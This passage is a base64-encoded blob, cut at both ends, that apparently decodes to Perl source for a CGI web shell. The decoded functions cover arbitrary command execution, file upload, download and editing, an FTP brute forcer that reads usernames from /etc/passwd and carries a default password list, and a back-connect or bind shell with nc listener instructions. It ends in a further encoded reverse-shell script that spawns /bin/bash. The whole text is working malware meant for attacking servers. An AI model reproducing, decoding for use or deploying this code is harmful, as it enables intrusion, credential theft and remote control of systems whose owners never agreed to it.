mlsZSBlcSAiIikNCgl7DQoJCXJldHVybiAmUHJpbnRGaWxlVXBsb2FkRm9ybTsNCg0KCX0NCglteSAkcmVzdWx0PSIiOw0KCSMgc3RhcnQgdGhlIHVwbG9hZGluZyBwcm9jZXNzDQoJJHJlc3VsdCAuPSAiVXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsNCg0KCSMgZ2V0IHRoZSBmdWxsbHkgcXVhbGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGNyZWF0ZWQNCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkkVHJhbnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOw0KCSRUYXJnZXROYW1lIC49ICRQYXRoU2VwLiQxOw0KDQoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7DQoJIyBpZiB0aGUgZmlsZSBleGlzdHMgYW5kIHdlIGFyZSBub3Qgc3VwcG9zZWQgdG8gb3ZlcndyaXRlIGl0DQoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpDQoJew0KCQkkcmVzdWx0IC49ICJGYWlsZWQ6IERlc3RpbmF0aW9uIGZpbGUgYWxyZWFkeSBleGlzdHMuPGJyPiI7DQoJfQ0KCWVsc2UgIyBmaWxlIGlzIG5vdCBwcmVzZW50DQoJew0KCQlpZihvcGVuKFVQTE9BREZJTEUsICI+JFRhcmdldE5hbWUiKSkNCgkJew0KCQkJYmlubW9kZShVUExPQURGSUxFKSBpZiAkV2luTlQ7DQoJCQlwcmludCBVUExPQURGSUxFICRpbnsnZmlsZWRhdGEnfTsNCgkJCWNsb3NlKFVQTE9BREZJTEUpOw0KCQkJJHJlc3VsdCAuPSAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7DQoJCQkkcmVzdWx0IC49ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQkkcmVzdWx0IC49ICJGYWlsZWQ6ICQhPGJyPiI7DQoJCX0NCgl9DQoJJHJlc3VsdCAuPSAmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUuIElmIHRoZQ0KIyBmaWxlbmFtZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhDQojIGZpbGUsIG90aGVyd2lzZSBpdCBkaXNwbGF5cyBhIG1lc3NhZ2UgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluaw0KIyB0aHJvdWdoICB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBEb3dubG9hZEZpbGUNCnsNCgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgZG93bmxvYWQgZm9ybSBhZ2Fpbg0KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCXJldHVybiAmUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KCX0NCg0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwgKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0KCWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAkUGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2UgaGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQlyZXR1cm4gJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhhdmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCXJldHVybiAmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsNCgl9DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGV4ZWN1dGUgY29tbWFuZHMuIEl0IGRpc3BsYXlzIHRoZSBvdXRwdXQgb2YgdGhlDQojIGNvbW1hbmQgYW5kIGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBhbm90aGVyIGNvbW1hbmQuIFRoZSBjaGFuZ2UgZGlyZWN0b3J5DQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4NCiMgYW4gaW50ZXJuYWwgdmFyaWFibGUgYW5kIGlzIHVzZWQgZWFjaCB0aW1lIGEgY29tbWFuZCBoYXMgdG8gYmUgZXhlY3V0ZWQuIFRoZQ0KIyBvdXRwdXQgb2YgdGhlIGNoYW5nZSBkaXJlY3RvcnkgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkIHRvIHRoZSB1c2Vycw0KIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90IGJlIGRpc3BsYXllZC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBFeGVjdXRlQ29tbWFuZA0Kew0KCSRDdXJyZW50RGlyID0gJlRyaW1TbGFzaGVzKCRDdXJyZW50RGlyKTsNCglteSAkcmVzdWx0PSIiOw0KCWlmKCRSdW5Db21tYW5kID1+IG0vXlxzKmNkXHMrKC4rKS8pICMgaXQgaXMgYSBjaGFuZ2UgZGlyIGNvbW1hbmQNCgl7DQoJCSMgd2UgY2hhbmdlIHRoZSBkaXJlY3RvcnkgaW50ZXJuYWxseS4gVGhlIG91dHB1dCBvZiB0aGUNCgkJIyBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQuDQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4iY2QgJDEiLiRDbWRTZXAuJENtZFB3ZDsNCgkJY2hvbXAoJEN1cnJlbnREaXIgPSBgJENvbW1hbmRgKTsNCgkJJHJlc3VsdCAuPSAmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCg0KCQkkcmVzdWx0IC49ICJDb21tYW5kOiA8cnVuPiRSdW5Db21tYW5kIDwvcnVuPjxicj48dGV4dGFyZWEgY29scz0nJGNvbHMnIHJvd3M9JyRyb3dzJyBzcGVsbGNoZWNrPSdmYWxzZSc+IjsNCgkJIyB4dWF0IHRob25nIHRpbiBraGkgY2h1eWVuIGRlbiAxIHRodSBtdWMgbmFvIGRvIQ0KCQkkUnVuQ29tbWFuZD0gJFdpbk5UPyJkaXIiOiJkaXIgLWxpYSI7DQoJCSRyZXN1bHQgLj0gJlJ1bkNtZDsNCgl9ZWxzaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqZWRpdFxzKyguKykvKQ0KCXsNCgkJJHJlc3VsdCAuPSAgJlNhdmVGaWxlRm9ybTsNCgl9ZWxzZQ0KCXsNCgkJJHJlc3VsdCAuPSAmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZDwvcnVuPjxicj48dGV4dGFyZWEgaWQ9J2RhdGEnIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7DQoJCSRyZXN1bHQgLj0mUnVuQ21kOw0KCX0NCgkkcmVzdWx0IC49ICAiPC90ZXh0YXJlYT4iOw0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBydW4gY29tbWFuZA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFJ1bkNtZA0Kew0KCW15ICRyZXN1bHQ9IiI7DQoJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiRSdW5Db21tYW5kLiRSZWRpcmVjdG9yOw0KCWlmKCEkV2luTlQpDQoJew0KCQkkU0lHeydBTFJNJ30gPSBcJkNvbW1hbmRUaW1lb3V0Ow0KCQlhbGFybSgkQ29tbWFuZFRpbWVvdXREdXJhdGlvbik7DQoJfQ0KCWlmKCRTaG93RHluYW1pY091dHB1dCkgIyBzaG93IG91dHB1dCBhcyBpdCBpcyBnZW5lcmF0ZWQNCgl7DQoJCSR8PTE7DQoJCSRDb21tYW5kIC49ICIgfCI7DQoJCW9wZW4oQ29tbWFuZE91dHB1dCwgJENvbW1hbmQpOw0KCQl3aGlsZSg8Q29tbWFuZE91dHB1dD4pDQoJCXsNCgkJCSRfID1+IHMvKFxufFxyXG4pJC8vOw0KCQkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygiJF9cbiIpOw0KCQl9DQoJCSR8PTA7DQoJfQ0KCWVsc2UgIyBzaG93IG91dHB1dCBhZnRlciBjb21tYW5kIGNvbXBsZXRlcw0KCXsNCgkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygkQ29tbWFuZCk7DQoJfQ0KCWlmKCEkV2luTlQpDQoJew0KCQlhbGFybSgwKTsNCgl9DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQojIEZvcm0gU2F2ZSBGaWxlIA0KIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0Kc3ViIFNhdmVGaWxlRm9ybQ0Kew0KCW15ICRyZXN1bHQgPSIiOw0KCSRFbmNvZGVDdXJyZW50RGlyID0gRW5jb2RlRGlyKCRDdXJyZW50RGlyKTsNCglzdWJzdHIoJFJ1bkNvbW1hbmQsMCw1KT0iIjsNCglteSAkZmlsZT0mdHJpbSgkUnVuQ29tbWFuZCk7DQoJJHNhdmU9Jzxicj48aW5wdXQgbmFtZT0iYSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0ic2F2ZSIgPic7DQoJJEZpbGU9JEN1cnJlbnREaXIuJFBhdGhTZXAuJFJ1bkNvbW1hbmQ7DQoJbXkgJGRpcj0iPHNwYW4gc3R5bGU9J2ZvbnQ6IDExcHQgVmVyZGFuYTsgZm9udC13ZWlnaHQ6IGJvbGQ7Jz4iLiZBZGRMaW5rRGlyKCJndWkiKS4iPC9zcGFuPiI7DQoJaWYoLXcgJEZpbGUpDQoJew0KCQkkcm93cz0iMjMiDQoJfWVsc2UNCgl7DQoJCSRtc2c9Ijxicj48Zm9udCBzdHlsZT0nY29sb3I6IHllbGxvdzsnID4gQ2Fubid0IHdyaXRlIGZpbGUhPGZvbnQ+PGJyPiI7DQoJCSRyb3dzPSIyMCINCgl9DQoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICI8Zm9udCBjb2xvcj0nI0ZGRkZGRic+W2FkbWluXEAkU2VydmVyTmFtZSAkZGlyXVwkPC9mb250PiAiOw0KCSRSdW5Db21tYW5kID0gImVkaXQgJFJ1bkNvbW1hbmQiOw0KCSRyZXN1bHQgLj0gIDw8RU5EOw0KCTxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KDQoJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRFbmNvZGVDdXJyZW50RGlyIj4NCgkkUHJvbXB0DQoJPGlucHV0IHR5cGU9InRleHQiIHNpemU9IjQwIiBuYW1lPSJjIj4NCgk8aW5wdXQgbmFtZT0icyIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPg0KCTxicj5Db21tYW5kOiA8cnVuPiAkUnVuQ29tbWFuZCA8L3J1bj4NCgk8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJmaWxlIiB2YWx1ZT0iJGZpbGUiID4gJHNhdmUgPGJyPiAkbXNnDQoJPGJyPjx0ZXh0YXJlYSBpZD0iZGF0YSIgbmFtZT0iZGF0YSIgY29scz0iJGNvbHMiIHJvd3M9IiRyb3dzIiBzcGVsbGNoZWNrPSJmYWxzZSI+DQpFTkQNCg0KCSRyZXN1bHQgLj0gJkh0bWxTcGVjaWFsQ2hhcnMoJkZpbGVPcGVuKCRGaWxlLDApKTsNCgkkcmVzdWx0IC49ICI8L3RleHRhcmVhPiI7DQoJJHJlc3VsdCAuPSAiPC9mb3JtPiI7DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQojIEZpbGUgT3Blbg0KIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0Kc3ViIEZpbGVPcGVuKCQpew0KCW15ICRmaWxlID0gc2hpZnQ7DQoJbXkgJGJpbmFyeSA9IHNoaWZ0Ow0KCW15ICRyZXN1bHQgPSAiIjsNCglteSAkbiA9ICIiOw0KCWlmKC1mICRmaWxlKXsNCgkJaWYob3BlbihGSUxFLCRmaWxlKSl7DQoJCQlpZigkYmluYXJ5KXsNCgkJCQliaW5tb2RlIEZJTEU7DQoJCQl9DQoJCQl3aGlsZSAoKCRuID0gcmVhZCBGSUxFLCAkZGF0YSwgMTAyNCkgIT0gMCkgew0KCQkJCSRyZXN1bHQgLj0gJGRhdGE7DQoJCQl9DQoJCQljbG9zZShGSUxFKTsNCgkJfQ0KCX1lbHNlDQoJew0KCQlyZXR1cm4gIk5vdCdzIGEgRmlsZSEiOw0KCX0NCglyZXR1cm4gJHJlc3VsdDsNCn0NCiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCiMgU2F2ZSBGaWxlDQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQpzdWIgU2F2ZUZpbGUoJCkNCnsNCglteSAkRGF0YT0gc2hpZnQgOw0KCW15ICRGaWxlPSBzaGlmdDsNCgkkRmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kRmlsZTsNCglpZihvcGVuKEZJTEUsICI+JEZpbGUiKSkNCgl7DQoJCWJpbm1vZGUgRklMRTsNCgkJcHJpbnQgRklMRSAkRGF0YTsNCgkJY2xvc2UgRklMRTsNCgkJcmV0dXJuIDE7DQoJfWVsc2UNCgl7DQoJCXJldHVybiAwOw0KCX0NCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQnJ1dGUgRm9yY2VyIEZvcm0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBCcnV0ZUZvcmNlckZvcm0NCnsNCglteSAkcmVzdWx0PSIiOw0KCSRyZXN1bHQgLj0gPDxFTkQ7DQoNCjx0YWJsZT4NCg0KPHRyPg0KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjPGJyPg0KU2ltcGxlIEZUUCBicnV0ZSBmb3JjZXI8YnI+DQpOb3RlOiBPbmx5IHNjYW4gZnJvbSAxIHRvIDMgdXNlciA6LVM8YnI+DQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KDQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iYnJ1dGVmb3JjZXIiLz4NCjwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPlVzZXI6PGJyPjx0ZXh0YXJlYSByb3dzPSIxOCIgY29scz0iMzAiIG5hbWU9InVzZXIiPg0KRU5EDQpjaG9wKCRyZXN1bHQgLj0gYGxlc3MgL2V0Yy9wYXNzd2QgfCBjdXQgLWQ6IC1mMWApOw0KJHJlc3VsdCAuPSA8PCdFTkQnOw0KPC90ZXh0YXJlYT48L3RkPg0KPHRkPg0KDQpQYXNzOjxicj4NCjx0ZXh0YXJlYSByb3dzPSIxOCIgY29scz0iMzAiIG5hbWU9InBhc3MiPjEyM3Bhc3MNCjEyMyFAIw0KMTIzYWRtaW4NCjEyM2FiYw0KMTIzNDU2YWRtaW4NCjEyMzQ1NTQzMjENCjEyMzQ0MzIxDQpwYXNzMTIzDQphZG1pbg0KYWRtaW5jcA0KYWRtaW5pc3RyYXRvcg0KbWF0a2hhdQ0KcGFzc2FkbWluDQpwQHNzd29yZA0KcEBzc3cwcmQNCnBhc3N3b3JkDQoxMjM0NTYNCjEyMzQ1NjcNCjEyMzQ1Njc4DQoxMjM0NTY3ODkNCjEyMzQ1Njc4OTANCjExMTExMQ0KMDAwMDAwDQoyMjIyMjINCjMzMzMzMw0KNDQ0NDQ0DQo1NTU1NTUNCjY2NjY2Ng0KNzc3Nzc3DQo4ODg4ODgNCjk5OTk5OQ0KMTIzMTIzDQoyMzQyMzQNCjM0NTM0NQ0KNDU2NDU2DQo1Njc1NjcNCjY3ODY3OA0KNzg5Nzg5DQoxMjMzMjENCjQ1NjY1NA0KNjU0MzIxDQo3NjU0MzIxDQo4NzY1NDMyMQ0KOTg3NjU0MzIxDQowOTg3NjU0MzIxDQphZG1pbjEyMw0KYWRtaW4xMjM0NTYNCmFiY2RlZg0KYWJjYWJjDQohQCMhQCMNCiFAIyQlXg0KIUAjJCVeJiooDQohQCMkJCNAIQ0KYWJjMTIzDQphbmh5ZXVlbQ0KaWxvdmV5b3U8L3RleHRhcmVhPg0KPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQgY29sc3Bhbj0iMiIgYWxpZ249ImNlbnRlciI+DQpTbGVlcDo8c2VsZWN0IG5hbWU9InNsZWVwIj4NCg0KPG9wdGlvbj4wPC9vcHRpb24+DQo8b3B0aW9uPjE8L29wdGlvbj4NCjxvcHRpb24+Mjwvb3B0aW9uPg0KDQo8b3B0aW9uPjM8L29wdGlvbj4NCjwvc2VsZWN0PiANCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCcnV0ZSBGb3JjZXIiLz48L3RkPjwvdHI+DQo8L2Zvcm0+DQo8L3RhYmxlPg0KRU5EDQpyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQnJ1dGUgRm9yY2VyDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQnJ1dGVGb3JjZXINCnsNCglteSAkcmVzdWx0PSIiOw0KCSRTZXJ2ZXI9JEVOVnsnU0VSVkVSX0FERFInfTsNCglpZigkaW57J3VzZXInfSBlcSAiIikNCgl7DQoJCSRyZXN1bHQgLj0gJkJydXRlRm9yY2VyRm9ybTsNCgl9ZWxzZQ0KCXsNCgkJdXNlIE5ldDo6RlRQOyANCgkJQHVzZXI9IHNwbGl0KC9cbi8sICRpbnsndXNlcid9KTsNCgkJQHBhc3M9IHNwbGl0KC9cbi8sICRpbnsncGFzcyd9KTsNCgkJY2hvbXAoQHVzZXIpOw0KCQljaG9tcChAcGFzcyk7DQoJCSRyZXN1bHQgLj0gIjxicj48YnI+WytdIFRyeWluZyBicnV0ZSAkU2VydmVyTmFtZTxicj49PT09PT09PT09PT09PT09PT09PT4+Pj4+Pj4+Pj4+Pjw8PDw8PDw8PDw9PT09PT09PT09PT09PT09PT09PTxicj48YnI+XG4iOw0KCQlmb3JlYWNoICR1c2VybmFtZSAoQHVzZXIpDQoJCXsNCgkJCWlmKCR1c2VybmFtZSBuZSAiIikNCgkJCXsNCgkJCQlmb3JlYWNoICRwYXNzd29yZCAoQHBhc3MpDQoJCQkJew0KCQkJCQkkZnRwID0gTmV0OjpGVFAtPm5ldygkU2VydmVyKSBvciBkaWUgIkNvdWxkIG5vdCBjb25uZWN0IHRvICRTZXJ2ZXJOYW1lXG4iOyANCgkJCQkJaWYoJGZ0cC0+bG9naW4oIiR1c2VybmFtZSIsIiRwYXNzd29yZCIpKQ0KCQkJCQl7DQoJCQkJCQkkcmVzdWx0IC49ICI8YSB0YXJnZXQ9J19ibGFuaycgaHJlZj0nZnRwOi8vJHVzZXJuYW1lOiRwYXNzd29yZFxAJFNlcnZlcic+WytdIGZ0cDovLyR1c2VybmFtZTokcGFzc3dvcmRcQCRTZXJ2ZXI8L2E+PGJyPlxuIjsNCgkJCQkJCSRmdHAtPnF1aXQoKTsNCgkJCQkJCWJyZWFrOw0KCQkJCQl9DQoJCQkJCWlmKCRpbnsnc2xlZXAnfSBuZSAiMCIpDQoJCQkJCXsNCgkJCQkJCXNsZWVwKGludCgkaW57J3NsZWVwJ30pICogMTAwMCk7DQoJCQkJCX0NCgkJCQkJJGZ0cC0+cXVpdCgpOw0KCQkJCX0NCgkJCX0NCgkJfQ0KCQkkcmVzdWx0IC49ICJcbjxicj49PT09PT09PT09Pj4+Pj4+Pj4+PiBGaW5pc2hlZCA8PDw8PDw8PDw8PT09PT09PT09PTxicj5cbiI7DQoJfQ0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBCYWNrY29ubmVjdCBGb3JtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQmFja0JpbmRGb3JtDQp7DQoJcmV0dXJuIDw8RU5EOw0KCTxicj48YnI+DQoNCgk8dGFibGU+DQoJPHRyPg0KCTxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KCTx0ZD5CYWNrQ29ubmVjdDogPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImJhY2tiaW5kIj48L3RkPg0KCTx0ZD4gSG9zdDogPGlucHV0IHR5cGU9InRleHQiIHNpemU9IjIwIiBuYW1lPSJjbGllbnRhZGRyIiB2YWx1ZT0iJEVOVnsnUkVNT1RFX0FERFInfSI+DQoJIFBvcnQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSI2IiBuYW1lPSJjbGllbnRwb3J0IiB2YWx1ZT0iODAiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiYScpLmlubmVySFRNTD10aGlzLnZhbHVlOyI+PC90ZD4NCg0KCTx0ZD48aW5wdXQgbmFtZT0icyIgdHlwZT0ic3VibWl0IiBuYW1lPSJzdWJtaXQiIHZhbHVlPSJDb25uZWN0Ij48L3RkPg0KCTwvZm9ybT4NCgk8L3RyPg0KCTx0cj4NCgk8dGQgY29sc3Bhbj0zPjxmb250IGNvbG9yPSNGRkZGRkY+WytdIENsaWVudCBsaXN0ZW4gYmVmb3JlIGNvbm5lY3QgYmFjayENCgk8YnI+WytdIFRyeSBjaGVjayB5b3VyIFBvcnQgd2l0aCA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3d3dy5jYW55b3VzZWVtZS5vcmcvIj5odHRwOi8vd3d3LmNhbnlvdXNlZW1lLm9yZy88L2E+DQoJPGJyPlsrXSBDbGllbnQgbGlzdGVuIHdpdGggY29tbWFuZDogPHJ1bj5uYyAtdnYgLWwgLXAgPHNwYW4gaWQ9ImJhIj44MDwvc3Bhbj48L3J1bj48L2ZvbnQ+PC90ZD4NCg0KCTwvdHI+DQoJPC90YWJsZT4NCg0KCTxicj48YnI+DQoJPHRhYmxlPg0KCTx0cj4NCgk8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCgk8dGQ+QmluZCBQb3J0OiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iYmFja2JpbmQiPjwvdGQ+DQoNCgk8dGQ+IFBvcnQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxNSIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjE0MTIiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaScpLmlubmVySFRNTD10aGlzLnZhbHVlOyI+DQoNCgkgUGFzc3dvcmQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxMiIgbmFtZT0iYmluZHBhc3MiIHZhbHVlPSJ2aW5ha2lkIj48L3RkPg0KCTx0ZD48aW5wdXQgbmFtZT0icyIgdHlwZT0ic3VibWl0IiBuYW1lPSJzdWJtaXQiIHZhbHVlPSJCaW5kIj48L3RkPg0KCTwvZm9ybT4NCgk8L3RyPg0KCTx0cj4NCgk8dGQgY29sc3Bhbj0zPjxmb250IGNvbG9yPSNGRkZGRkY+WytdIFRlc3RpbmcgLi4uLg0KCTxicj5bK10gVHJ5IGNvbW1hbmQ6IDxydW4+bmMgJEVOVnsnU0VSVkVSX0FERFInfSA8c3BhbiBpZD0iYmkiPjE0MTI8L3NwYW4+PC9ydW4+PC9mb250PjwvdGQ+DQoNCgk8L3RyPg0KCTwvdGFibGU+PGJyPg0KRU5EDQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIEJhY2tjb25uZWN0IHVzZSBwZXJsDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQmFja0JpbmQNCnsNCgl1c2UgU29ja2V0OwkNCgkkYmFja3Blcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdTVTg2T2xOdlkydGxkRHNOQ2lSVGFHVnNiQWs5SUNJdlltbHVMMkpoYzJnaU93MEtKRUZTUjBNOVFFRlNSMVk3RFFwMWMyVWdVMjlqYTJWME93MEtkWE5sSUVacGJHVklZVzVrYkdVN0RRcHpiMk5yWlhRb1UwOURTMFZVTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2daMlYwY0hKdmRHOWllVzVoYldVb0luUmpjQ0lwS1NCdm